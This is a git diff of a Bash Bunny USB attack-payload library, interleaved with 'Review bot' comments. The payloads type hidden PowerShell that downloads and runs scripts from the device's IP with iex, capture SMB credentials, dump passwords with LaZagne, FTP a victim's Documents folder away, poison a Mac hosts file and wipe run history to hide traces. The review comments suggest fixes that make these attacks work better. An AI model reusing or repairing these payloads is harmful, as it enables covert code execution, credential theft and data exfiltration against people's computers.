STORAGE @@ -32,4 +35,3 @@ LED G #If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below #QUACK DELAY 4500 #shutdown 0 - diff --git a/payloads/library/execution/psh_DownloadExecSMB/psh.txt b/payloads/library/execution/psh_DownloadExec/p.txt old mode 100755 new mode 100644 similarity index 100% rename from payloads/library/execution/psh_DownloadExecSMB/psh.txt rename to payloads/library/execution/psh_DownloadExec/p.txt diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt index e0e55353..1170f079 100644 --- a/payloads/library/execution/psh_DownloadExec/payload.txt +++ b/payloads/library/execution/psh_DownloadExec/payload.txt 
@@ -8,51 +8,49 @@ # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.3 # -# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory -# +# Quick HID attack to retrieve and run powershell payload from BashBunny web server +# ensure p.txt (your powershell payload) exists in payload directory +# # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | # | Stage 1 | Running Initial Powershell Commands | -# | Stage 3 | Delivering powershell payload | +# | Stage 2 | Delivering powershell payload | # ATTACKMODE RNDIS_ETHERNET HID LED SETUP +REQUIRETOOL gohttp GET HOST_IP GET SWITCH_POSITION -# Set working dir -PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -SERVER_LOG=$PAYLOAD_DIR/server.log +# DEFINE DIRECTORIES +PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION} +SERVER_LOG=/tmp/server.log -# Fresh Server Log -rm -f $SERVER_LOG +# SERVER LOG +rm -f ${SERVER_LOG} -# Check for gohttp -REQUIRETOOL gohttp - -# Start web server +# START HTTP SERVER iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately -/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 & +/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 & -# Check for psh.txt -if [ ! -f $PAYLOAD_DIR/psh.txt ]; then +# CHECK FOR POWERSHELL +if [ ! 
-f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL2 exit 1 fi +cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp -# Attack HID +# STAGE 1 - POWERSHELL LED STAGE1 -# Attack (abbreviations to allow run execution) -RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" +RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" # Remove tracks in the psh payload if you wish -# Attack Ethernet +# STAGE 2 - WAIT LED STAGE2 - -while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do +while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do sleep .5 done diff --git a/payloads/library/execution/psh_DownloadExec/readme.md b/payloads/library/execution/psh_DownloadExec/readme.md index 5d96fd13..12d4ca8d 100644 --- a/payloads/library/execution/psh_DownloadExec/readme.md +++ b/payloads/library/execution/psh_DownloadExec/readme.md @@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve ## Configuration -Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. ## Requirements @@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info | Attack Stage | Description | | ------------------- | ---------------------------------------- | | Stage 1 | Running Initial Powershell Commands | -| Stage 3 | Delivering powershell payload | -``` \ No newline at end of file +| Stage 2 | Delivering powershell payload | +``` 
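Review bot: The HTTP server is now started with `-d /tmp/` and only afterwards does `cp -R ${PAYLOAD_DIR}/* /tmp/` populate it, so the document root is the shared `/tmp` (including `server.log` itself and anything another payload left there) and the assets appear only after the listener is already up; the SMB sibling in this same commit already stages into a dedicated `/tmp/p`, so `mkdir -p /tmp/p`, copying there above the `gohttp` line, and `-d /tmp/p/` would align the two and keep the log out of the served tree. The `RUN WIN` line also mixes `${HOST_IP}` for `p.txt` with a literal `172.16.64.1` for the `/DONE` request; the second URL should be `http://${HOST_IP}/DONE` as well, since the wait loop greps the same `${SERVER_LOG}` either way.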
diff --git a/payloads/library/execution/psh_DownloadExec/psh.txt b/payloads/library/execution/psh_DownloadExecSMB/p.txt old mode 100644 new mode 100755 similarity index 99% rename from payloads/library/execution/psh_DownloadExec/psh.txt rename to payloads/library/execution/psh_DownloadExecSMB/p.txt index ea23a0dd..71720880 --- a/payloads/library/execution/psh_DownloadExec/psh.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/p.txt @@ -1,3 +1,2 @@ New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue - diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index b05f2e2d..3a2592f4 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -2,23 +2,23 @@ # # Title: Powershell Download and Execute SMB # Author: LowValueTarget -# Version: 1.2 +# Version: 2.0 # Category: Powershell # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.2 # -# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. -# Ensure psh.txt exists in payload directory +# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! +# Credentials captured by are stored as loot. +# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # -# Requires Impacket is installed (python ./impacket/setup.py install) +# Required tools: impacket # # | Attack Stage | Description | # | ------------------- | ------------------------------| # | Stage 1 | Powershell | # | Stage 2 | Delivering powershell payload | # - ATTACKMODE RNDIS_ETHERNET HID # SETUP 
@@ -29,48 +29,48 @@ GET SWITCH_POSITION GET TARGET_HOSTNAME GET HOST_IP +# DEFINE DIRECTORIES PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -# Check for psh.txt -if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then +LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB + +mkdir -p /tmp/{l,p} + +# CHECK FOR POWERSHELL +if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL exit 1 fi -cp -R ${PAYLOAD_DIR}/* /tmp/ +cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp -LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB -# Setup named logs in loot directory -mkdir -p ${LOOTDIR} +# GET HOSTNAME HOST=${TARGET_HOSTNAME} -# If hostname is blank set it to "noname" -[[ -z "$HOST" ]] && HOST="noname" -COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l) +[[ -z "${HOST}" ]] && HOST="noname" +COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l) COUNT=$((COUNT+1)) -mkdir -p ${LOOTDIR}/${HOST}-$COUNT +mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT} +LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT} -# Log file -LOGFILE=psh_smb.log +# START SMB SERVER +LOGFILE=/tmp/l/psh_downloadsmb.log +touch ${LOGFILE} +python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} & -# Start SMB Server -mkdir -p /loot -python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} & - -# STAGE 1 - Powershell +# STAGE 1 - POWERSHELL LED STAGE1 +RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\"" +# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot +# TIP: Remove tracks in the psh payload if you wish -RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item 
\\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\"" -# Remove tracks in the psh payload if you wish - -# STAGE 2 - Wait until payload retrieved -# Wait until payload is retrieved +# STAGE 2 - HURRY UP AND WAIT LED STAGE2 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done # CLEANUP LED CLEANUP -# Move loot to mass storage -mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT -rm /loot/${LOGFILE} +# STASH THE LOOT +mv /tmp/l/* ${LOOTDIR_BB}/ +rm -rf /tmp/{l,p} # Sync file system sync diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md index 42c29490..644b3d3c 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/readme.md +++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md @@ -10,16 +10,20 @@ ## Description -Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. +Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot. ## Configuration -* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed. -* Requires Impacket is installed (python ./impacket/setup.py install) +* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed. +* Requires Impacket + +__Installation__ + +See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/ ## STATUS | Attack Stage | Description | | ------------------- | ------------------------------| | Stage 1 | Powershell | -| Stage 2 | Delivering powershell payload | \ No newline at end of file +| Stage 2 | Delivering powershell payload | diff --git a/payloads/library/exfiltration/BlackBackup/payload.txt b/payloads/library/exfiltration/BlackBackup/payload.txt index e7a8f9a6..640b687d 100644 --- a/payloads/library/exfiltration/BlackBackup/payload.txt +++ b/payloads/library/exfiltration/BlackBackup/payload.txt 
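Review bot: The smbserver.py launched in the background under `# START SMB SERVER` is never stopped, so `mv /tmp/l/* ${LOOTDIR_BB}/` and `rm -rf /tmp/{l,p}` run while it still serves the share and holds `${LOGFILE}` open, and the moved log can be incomplete. Capture the PID and stop the server before stashing: `SMB_PID=$!` after the python line, then `kill "${SMB_PID}"; wait "${SMB_PID}"` just before `# STASH THE LOOT`. `mv /tmp/l/*` also fails with a "cannot stat" error when nothing was uploaded to `l`, because the unmatched glob stays literal; guarding it with `[ -n "$(ls -A /tmp/l)" ] && mv /tmp/l/* "${LOOTDIR_BB}/"` avoids the spurious failure.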
@@ -2,7 +2,7 @@ # Author: JWHeuver & JBaselier # Version: 1.0 # -# Runs powershell script to get Wlan and logon credentials +# Runs powershell script to get Wlan and logon credentials # from computer and save them on USB drive (Storage attack) # # Purple.............Loading @@ -14,19 +14,18 @@ # OPTIONS - More options available in the Powershell payload OBFUSCATECMD="N" # Y=yes or N=no -# Source bunny_helpers.sh to get environment variable and switch_positions -source bunny_helpers.sh - #----------------------------------- # Purple LED - initializing -LED R B 0 +LED SETUP + +GET SWITCH_POSITION # Attackmode HID / Storage ATTACKMODE HID STORAGE #----------------------------------- # Green LED - executing credential_powershell -LED G 0 +LED STAGE1 QUACK GUI r QUACK DELAY 300 @@ -57,4 +56,4 @@ QUACK ENTER #----------------------------------- # Kill the lights - finished -LED 0 +LED FINISH diff --git a/payloads/library/exfiltration/FileInfoExfil/payload.txt b/payloads/library/exfiltration/FileInfoExfil/payload.txt index e7e08bfa..b0854cf4 100644 --- a/payloads/library/exfiltration/FileInfoExfil/payload.txt +++ b/payloads/library/exfiltration/FileInfoExfil/payload.txt 
@@ -11,49 +11,40 @@ # Purple LED..................Script Started # Yellow LED..................Ducky Script Started # Red LED.....................Failed to run Ducky Script, see log file -# +# # NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # -LED B R +LED SETUP + +GET SWITCH_POSITION ATTACKMODE HID STORAGE - - -# Set language -QUACK SET_LANGUAGE gb - - -# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned -source bunny_helpers.sh - - - if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then - -#Call ducky script -LED R G - +#Call ducky script +LED STAGE1 + + QUACK ${SWITCH_POSITION}/ducky_script.txt - - + + QUACK DELAY 10000 -LED R G B +LED FINISH else - - -LED R - + + +LED FAIL + #Red LED if unable to load script echo "Unable to load ducky_script.txt" >> /root/debuglog.txt - - + + exit 1 diff --git a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt index b0ccbae6..b5553363 100644 --- a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt +++ b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt @@ -4,18 +4,18 @@ # Author: $irLurk$alot # Version: 1.0 # Target: Windows -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn runs powershell script to copy move and extract data. -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh +LED SETUP + +GET SWITCH_POSITION -LED R 100 ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 -LED R B 100 +LED ATTACK QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" QUACK ENTER -LED R G B +LED FINISH diff --git a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt index eff48232..f2bc2b59 100644 
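Review bot: Several lines in this hunk are added as whitespace-only (`+ ` with trailing spaces inside the `if`/`else` branches), which is exactly the trailing whitespace the commit strips elsewhere (`-# ` → `+#`); shfmt or ShellCheck-driven cleanup would remove them. The `#Call ducky script`, `LED STAGE1` and `QUACK` lines inside the `if` branch sit at column 0 while `exit 1` under `else` is indented, so the branch structure is hard to read; indenting both branches two spaces would make it consistent. The closing `fi` of this `if` is outside the hunk.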
--- a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt @@ -4,7 +4,7 @@ # Author: Nutt # Version: 1.0 # Target: Windows -# +# #Exfiltrates files from the users Documents folder #FTP's all files/folders to a specified FTP site named by the victim hostname. #Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. @@ -15,13 +15,12 @@ #Red............Failed - Need to work on #Green..........Finished -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R B +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 1000 +LED ATTACK QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" QUACK ENTER -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/exfiltration/usb_exfiltrator/e.cmd b/payloads/library/exfiltration/usb_exfiltrator/e.cmd index 4e9db02b..9bc85762 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/e.cmd +++ b/payloads/library/exfiltration/usb_exfiltrator/e.cmd @@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious + +REM This executes LaZagne in the current directory and outputs the password file to Loot +REM Time and Date is also added +setlocal +cd /d %~dp0 +%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" + +REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul 
@@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories -xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul +REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul + ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls -@exit \ No newline at end of file +@exit diff --git a/payloads/library/exfiltration/usb_exfiltrator/payload.txt b/payloads/library/exfiltration/usb_exfiltrator/payload.txt index 8df6290e..44f50d59 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/usb_exfiltrator/payload.txt @@ -6,12 +6,12 @@ # Target: Windows XP SP3+ # Props: Diggster, IMcPwn # Category: Exfiltration -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn copies documents to the loot folder on the Bash Bunny. # - +GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" diff --git a/payloads/library/general/ExecutableInstaller/payload.txt b/payloads/library/general/ExecutableInstaller/payload.txt index 61ef2373..60521e82 100644 --- a/payloads/library/general/ExecutableInstaller/payload.txt +++ b/payloads/library/general/ExecutableInstaller/payload.txt 
@@ -4,22 +4,19 @@ # Author: IMcPwn # Version: 1.0 # Target: Windows 7+ -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn copies payload.exe from the root of the Bash Bunny and then executes it # using the --startup parameter. Change these settings inside of e.cmd. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R +LED SETUP +GET SWITCH_POSITION +LED ATTACK ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" QUACK ENTER - -# Green LED for finished -LED G +LED FINISH diff --git a/payloads/library/general/Proxy_Interceptor/payload.txt b/payloads/library/general/Proxy_Interceptor/payload.txt index b5e180f9..0b72fd42 100644 --- a/payloads/library/general/Proxy_Interceptor/payload.txt +++ b/payloads/library/general/Proxy_Interceptor/payload.txt @@ -19,10 +19,12 @@ LED R 50 #Set ATTACKMODE to HID and Storage to be able to transfer the certificate ATTACKMODE HID STORAGE -#Import Bunny Helpers -source bunny_helpers.sh -#Start of Script +LED SETUP +GET SWITCH_POSITION + +LED ATTACK +#Start of Script Q DELAY 6000 Q GUI r Q DELAY 100 @@ -39,6 +41,7 @@ Q STRING cd \$absPath Q ENTER Q DELAY 500 +LED ATTACK #Set the proxy in the internet settings in the registry (For IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')" Q ENTER @@ -62,4 +65,4 @@ Q DELAY 500 Q STRING EXIT Q ENTER sync -LED R B 100 +LED FINISH diff --git a/payloads/library/general/Windows NIC Sharing/p.ps1 b/payloads/library/general/Windows_NIC_Sharing/p.ps1 similarity index 100% rename from payloads/library/general/Windows NIC Sharing/p.ps1 rename to payloads/library/general/Windows_NIC_Sharing/p.ps1 
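Review bot: In Proxy_Interceptor, the `LED ATTACK` added in the `@@ -39,6 +41,7 @@` hunk repeats the `LED ATTACK` set a few lines earlier in the first hunk, so it changes nothing; the `LED R 50` that the first hunk's header shows as context also still precedes `ATTACKMODE HID STORAGE`, so setup now sets the LED three times. If the second call is meant to mark a distinct phase (the registry proxy step), `LED STAGE2` would say so; otherwise drop it, and consider replacing the leftover `LED R 50` with the new `LED SETUP`.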
diff --git a/payloads/library/general/Windows NIC Sharing/payload.txt b/payloads/library/general/Windows_NIC_Sharing/payload.txt similarity index 92% rename from payloads/library/general/Windows NIC Sharing/payload.txt rename to payloads/library/general/Windows_NIC_Sharing/payload.txt index bf19038b..16fdd574 100644 --- a/payloads/library/general/Windows NIC Sharing/payload.txt +++ b/payloads/library/general/Windows_NIC_Sharing/payload.txt @@ -23,7 +23,7 @@ # Sharing is caring # Right-Click Ineternet interface click on # "Properties" and select "Sharing" tab -# +# # From "Sharing" tab check # "Allow other netwrk usrs 2 connect... thru dis connection" # Select the Bash Bunny Gadget and hit "OK" @@ -34,9 +34,11 @@ # Set the IPv4=172.16.64.64 and Subnet=24-bit # Hit all the OKs +GET SWITCH_POSITION + # Or we could just have the Bash Bunny do all the work... LED SETUP -SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION +SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION) # HID Attack Starts ATTACKMODE HID diff --git a/payloads/library/general/Windows NIC Sharing/readme.md b/payloads/library/general/Windows_NIC_Sharing/readme.md similarity index 100% rename from payloads/library/general/Windows NIC Sharing/readme.md rename to payloads/library/general/Windows_NIC_Sharing/readme.md diff --git a/payloads/library/general/Windows NIC Sharing/server.py b/payloads/library/general/Windows_NIC_Sharing/server.py similarity index 100% rename from payloads/library/general/Windows NIC Sharing/server.py rename to payloads/library/general/Windows_NIC_Sharing/server.py diff --git a/payloads/library/phishing/dns_poisoning_mac/README.md b/payloads/library/phishing/dns_poisoning_mac/README.md new file mode 100644 index 00000000..351bd0b7 --- /dev/null +++ b/payloads/library/phishing/dns_poisoning_mac/README.md 
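Review bot: `SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)` uses command substitution, not parameter expansion: bash will try to run a command named `SWITCH_POSITION`, print a "command not found" error, and substitute an empty string, leaving `SWITCHDIR=/root/udisk/payloads/`. The removed line had the right form; it should read `SWITCHDIR=/root/udisk/payloads/${SWITCH_POSITION}`, with the `GET SWITCH_POSITION` added above it supplying the variable.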
@@ -0,0 +1,9 @@
+# DNS Poisoning Attack Mac
+
+## Description
+
+Redirects a domain to a set IP adres by changing the hosts file.
+
+## Configuration
+
+Change the domain you want to redirect and the IP you want to direct it to.
diff --git a/payloads/library/phishing/dns_poisoning_mac/payload.txt b/payloads/library/phishing/dns_poisoning_mac/payload.txt
new file mode 100644
index 00000000..5bc7f7b8
--- /dev/null
+++ b/payloads/library/phishing/dns_poisoning_mac/payload.txt
@@ -0,0 +1,23 @@
+#Title: DNS Poisoning Mac
+#Description: Attacks the host file to redirect a website of your chosing for a given domain
+#Author: thehappydinoa
+#Target: OS X
+
+LED R 200
+
+ATTACKMODE HID
+LED STAGE1
+Q DELAY 400
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 200
+Q ENTER
+Q DELAY 400
+Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
+Q DELAY 50
+Q ENTER
+Q STRING exit
+Q ENTER
+
+LED FINISH
diff --git a/payloads/library/prank/RickRoll/payload.txt b/payloads/library/prank/RickRoll/payload.txt
index 75ad5c49..106f9e0e 100644
--- a/payloads/library/prank/RickRoll/payload.txt
+++ b/payloads/library/prank/RickRoll/payload.txt
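Review bot: The new payload's header carries only `#Title:`/`#Description:`/`#Author:`/`#Target:` and opens with `LED R 200`, while every other payload touched by this commit has `# Version:` and `# Category:` lines and was moved to the named `LED SETUP` state. Adding `# Version: 1.0` and `# Category: Phishing` (matching the `payloads/library/phishing/` directory) and replacing `LED R 200` with `LED SETUP` would keep it consistent with the rest of the library. In the README, `IP adres` and `of your chosing` are typos for `IP address` and `of your choosing`.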
@@ -1,34 +1,37 @@ -#!/bin/bash -# -# Title: RickRoll Prank -# Author: illwill -# Version: 0.1 -# -# -# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes -# Blue...............Running Powershell / Waiting for WebServer to start -# White..............WebServer started starting the rickroll -# Green..............RickRoll Started, Safe to pull - - -LED B 200 -ATTACKMODE HID -Q GUI r -Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" -Q DELAY 300 -Q ENTER - - -ATTACKMODE RNDIS_ETHERNET -source bunny_helpers.sh -payload_dir=/root/udisk/payloads/$SWITCH_POSITION -cd $payload_dir -LED R G B 200 -iptables -A OUTPUT -p udp --dport 53 -j DROP -python -m SimpleHTTPServer 80 & -pid=$! -while ! nc -z localhost 80; do sleep 0.2; done -sleep 3 -LED G 200 -kill -9 $pid -exit +#!/bin/bash +# +# Title: RickRoll Prank +# Author: illwill +# Version: 0.1 +# +# +# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes +# Blue...............Running Powershell / Waiting for WebServer to start +# White..............WebServer started starting the rickroll +# Green..............RickRoll Started, Safe to pull + + +LED SETUP +GET SWITCH_POSITION + +LED STAGE1 +ATTACKMODE HID +Q GUI r +Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" +Q DELAY 300 +Q ENTER + +LED STAGE2 +ATTACKMODE RNDIS_ETHERNET +payload_dir=/root/udisk/payloads/$SWITCH_POSITION +cd $payload_dir +LED ATTACK +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & +pid=$! +while ! nc -z localhost 80; do sleep 0.2; done +sleep 3 + +LED FINISH +kill -9 $pid +exit \ No newline at end of file 
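Review bot: Every line of this payload is shown as removed and re-added although the text is identical apart from the `LED SETUP`/`GET SWITCH_POSITION`/`LED STAGE2`/`LED ATTACK`/`LED FINISH` changes, which suggests a line-ending change got mixed in (hard to confirm from the rendered text); the new side also ends with `\ No newline at end of file`, the opposite of what the commit does for PrivEscChecker and the readmes. Normalising line endings in a separate commit and adding the trailing newline would leave a reviewable diff. While here, `kill -9 $pid` against the SimpleHTTPServer the script itself started could be `kill "$pid"` so it exits cleanly.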
diff --git a/payloads/library/prank/macDesktop/macWallpaper.sh b/payloads/library/prank/macDesktop/macWallpaper.sh index bc858985..d691c4aa 100755 --- a/payloads/library/prank/macDesktop/macWallpaper.sh +++ b/payloads/library/prank/macDesktop/macWallpaper.sh @@ -1,25 +1,26 @@ pid=$$ touch /tmp/$pid +cd /tmp/ for (( i=0; i < 5; ++i )) do if [ ! -e /tmp/1.jpg ]; then - wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg"; + curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg"; fi if [ ! -e /tmp/2.jpg ]; then - wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg"; + curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/"; fi if [ ! -e /tmp/3.jpg ]; then - wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg"; + curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg"; fi if [ ! -e /tmp/4.jpg ]; then - wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg"; + curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg"; fi if [ ! -e /tmp/5.jpg ]; then - wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg"; + curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png"; fi let number="$RANDOM % 5 + 1 | bc" @@ -31,7 +32,7 @@ do killall Dock let time="$RANDOM % 18000 + 2700 | bc" echo $time - sleep $time + sleep $time done rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid diff --git a/payloads/library/prank/win93/payload.txt b/payloads/library/prank/win93/payload.txt index e5d35a1c..ef141979 100644 --- a/payloads/library/prank/win93/payload.txt +++ b/payloads/library/prank/win93/payload.txt 
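Review bot: The five `curl -0 N.jpg "URL"` lines pass `-0` (`--http1.0`), not `-o`, so `N.jpg` is treated as a second URL, the response goes to stdout and `/tmp/N.jpg` is never created; the `[ ! -e /tmp/N.jpg ]` guard then re-downloads on every loop iteration and the later `rm /tmp/1.jpg ...` has nothing to remove. The commit message says wget was changed to `curl -o`, so the flag should be `-o`, e.g. `curl -o 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";` on each of the five lines. The new `cd /tmp/` is unchecked while the guards still test absolute `/tmp/N.jpg` paths; `cd /tmp/ || exit 1` keeps the relative `-o N.jpg` and those checks pointing at the same directory.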
